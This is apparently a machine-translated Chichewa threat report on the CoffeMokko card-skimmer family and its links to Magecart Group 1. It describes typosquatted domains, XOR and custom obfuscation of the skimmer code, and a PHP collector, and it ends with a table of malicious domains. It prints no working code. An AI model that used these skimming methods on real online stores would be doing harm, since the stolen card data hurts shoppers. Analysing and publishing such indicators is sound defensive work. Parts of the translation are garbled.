M'makampeni oyambilira, owukira adalembetsa mayina amadomeni ofanana ndi a malo ogulitsa pa intaneti ovomerezeka. Madera awo amatha kusiyana ndi ovomerezeka ndi chizindikiro chimodzi kapena TLD ina. Madomeni olembetsedwa adagwiritsidwa ntchito kusunga khodi ya sniffer, ulalo womwe udayikidwa mu khodi ya sitolo.
Gululi linagwiritsanso ntchito mayina a mayina monga mapulagini otchuka a jQuery (slickjs[.]org kwa masamba ogwiritsa ntchito pulogalamu yowonjezera slick.js), njira zolipira (sagecdn[.]org kwa masamba omwe amagwiritsa ntchito njira yolipirira ya Sage Pay).
Pambuyo pake, gululi lidayamba kupanga madambwe omwe mayina awo analibe chochita ndi sitolo kapena mutu wa sitolo.
Chigawo chilichonse chimagwirizana ndi malo omwe chikwatucho chinapangidwira /js kapena /src. Zolemba za Sniffer zidasungidwa mu bukhuli: sniffer imodzi pa matenda atsopano aliwonse. Wowomberayo adayikidwa mu code ya webusayiti kudzera pa ulalo wachindunji, koma nthawi zina, owukira adasintha imodzi mwamafayilo awebusayiti ndikuwonjezera nambala yoyipa kwa iyo.
Kodi Analysis
Algorithm yoyamba ya obfuscation
M'zitsanzo zina zomwe zapezeka za onunkhiza abanja ili, nambalayo idasokonezedwa ndipo ili ndi chidziwitso chobisika chofunikira kuti wosutayo agwire ntchito: makamaka, adilesi yachipata cha sniffer, mndandanda wa minda yolipira, ndipo nthawi zina, nambala yabodza. fomu yolipira. Mu code yomwe ili mkati mwa ntchitoyi, zothandizira zidasungidwa pogwiritsa ntchito XOR ndi kiyi yomwe idaperekedwa ngati mtsutso ku ntchito yomweyo.
Pochotsa chingwecho ndi kiyi yoyenera, yapadera pa chitsanzo chilichonse, mutha kupeza chingwe chomwe chili ndi zingwe zonse kuchokera ku code sniffer yolekanitsidwa ndi olekanitsa.
Algorithm yachiwiri ya obfuscation
M'zitsanzo zamtsogolo za onunkhiza a banja ili, njira yosiyana ya obfuscation idagwiritsidwa ntchito: pamenepa, deta idabisidwa pogwiritsa ntchito algorithm yodzilemba yokha. Chingwe chokhala ndi data yobisika yofunikira kuti wosutayo agwiritse ntchito adaperekedwa ngati mtsutso ku ntchito yomasulira.
Pogwiritsa ntchito msakatuli wa msakatuli, mutha kutsitsa deta yosungidwa ndikupeza mndandanda womwe uli ndi zida zonunkhiza.
Kulumikizana ndi kuukira koyambirira kwa MageCart
Pakuwunika kwa madera omwe gululo limagwiritsidwa ntchito ngati chipata chotengera zomwe zabedwa, zidapezeka kuti derali lili ndi zida zakuba kwa kirediti kadi, zofanana ndi zomwe zimagwiritsidwa ntchito ndi Gulu 1, limodzi mwamagulu oyamba,
Mafayilo awiri adapezeka pagulu la osuta a CoffeMokko:
- mage.js - Fayilo yomwe ili ndi kachidindo ka Gulu 1 kamene kali ndi adilesi yachipata js-cdn.link
- mag.php - PHP script yomwe ili ndi udindo wosonkhanitsa zomwe zabedwa ndi wosuta
Zomwe zili mufayilo ya mage.js
Zinatsimikiziridwanso kuti madera oyambirira omwe amagwiritsidwa ntchito ndi gulu lomwe lili kumbuyo kwa banja la CoffeMokko la osuta adalembetsedwa pa May 17, 2017:
- link-js[.] ulalo
- info-js[.]uthenga
- track-js[.] ulalo
- map-js[.]uthenga
- smart-js[.]uthenga
Maonekedwe a mayina a mayinawa akufanana ndi mayina a mayina a Gulu 1 omwe adagwiritsidwa ntchito muzowukira za 2016.
Kutengera zomwe zapezedwa, titha kuganiza kuti pali kulumikizana pakati pa ogwiritsa ntchito CoffeMokko sniffers ndi gulu lachigawenga Gulu 1. Mwinamwake, ogwira ntchito ku CoffeMokko akanatha kubwereka zida ndi mapulogalamu kuchokera kwa omwe adawatsogolera kuti abe makadi. Komabe, zikutheka kuti gulu lachigawenga lomwe limagwiritsa ntchito banja la CoffeMokko la osuta ndi anthu omwewo omwe adachita zigawenga za Gulu 1. Kutsatira kusindikizidwa kwa lipoti loyamba la zochitika za gulu lachigawenga, mayina awo onse ankalamulira. otsekedwa ndipo zida zinaphunziridwa mwatsatanetsatane ndikufotokozedwa. Gululo lidakakamizidwa kuti lipume pang'ono, kuyeretsa zida zake zamkati ndikulembanso code ya sniffer kuti apitilize kuwukira ndikukhala osazindikirika.
Zachilengedwe
Kasitomala | Tsiku lodziwika/mawonekedwe |
---|---|
link-js.link | 17.05.2017 |
info-js.link | 17.05.2017 |
track-js.link | 17.05.2017 |
map-js.link | 17.05.2017 |
smart-js.link | 17.05.2017 |
adorebeauty.org | 03.09.2017 |
chitetezo-malipiro.su | 03.09.2017 |
braincdn.org | 04.09.2017 |
sagecdn.org | 04.09.2017 |
slickjs.org | 04.09.2017 |
oakandfort.org | 10.09.2017 |
citywnery.org | 15.09.2017 |
dobell.su | 04.10.2017 |
anasplayclothing.org | 31.10.2017 |
jewsondirect.com | 05.11.2017 |
shop-rnib.org | 15.11.2017 |
closetlondon.org | 16.11.2017 |
misshaus.org | 28.11.2017 |
battery-force.org | 01.12.2017 |
kik-vape.org | 01.12.2017 |
greatfurnituretradingco.org | 02.12.2017 |
etradesupply.org | 04.12.2017 |
replacemyremote.org | 04.12.2017 |
all-about-sneakers.org | 05.12.2017 |
mage-checkout.org | 05.12.2017 |
nililotan.org | 07.12.2017 |
lamoodbighat.net | 08.12.2017 |
walletgear.org | 10.12.2017 |
dahlie.org | 12.12.2017 |
davidsfootwear.org | 20.12.2017 |
blackriverrimaging.org | 23.12.2017 |
exrpesso.org | 02.01.2018 |
parks.su | 09.01.2018 |
pmtonline.su | 12.01.2018 |
otocap.org | 15.01.2018 |
christohperward.org | 27.01.2018 |
coffetea.org | 31.01.2018 |
energycoffe.org | 31.01.2018 |
energytea.org | 31.01.2018 |
teacoffe.net | 31.01.2018 |
adaptivecss.org | 01.03.2018 |
coffemokko.com | 01.03.2018 |
londontea.net | 01.03.2018 |
ukcoffe.com | 01.03.2018 |
labbe.biz | 20.03.2018 |
batterynart.com | 03.04.2018 |
btosports.net | 09.04.2018 |
chicksaddlery.net | 16.04.2018 |
paypay.org | 11.05.2018 |
ar500arnor.com | 26.05.2018 |
authorizecdn.com | 28.05.2018 |
slickmin.com | 28.05.2018 |
bannerbuzz.info | 03.06.2018 |
kandypens.net | 08.06.2018 |
mylrendyphone.com | 15.06.2018 |
freshchat.info | 01.07.2018 |
3lift.org | 02.07.2018 |
abtasty.net | 02.07.2018 |
mechat.info | 02.07.2018 |
zoplm.com | 02.07.2018 |
zapaljs.com | 02.09.2018 |
foodandcot.com | 15.09.2018 |
freshdepor.com | 15.09.2018 |
swappastore.com | 15.09.2018 |
verywellfitnesse.com | 15.09.2018 |
elegrina.com | 18.11.2018 |
majsurplus.com | 19.11.2018 |
Top5value.com | 19.11.2018 |
Source: www.habr.com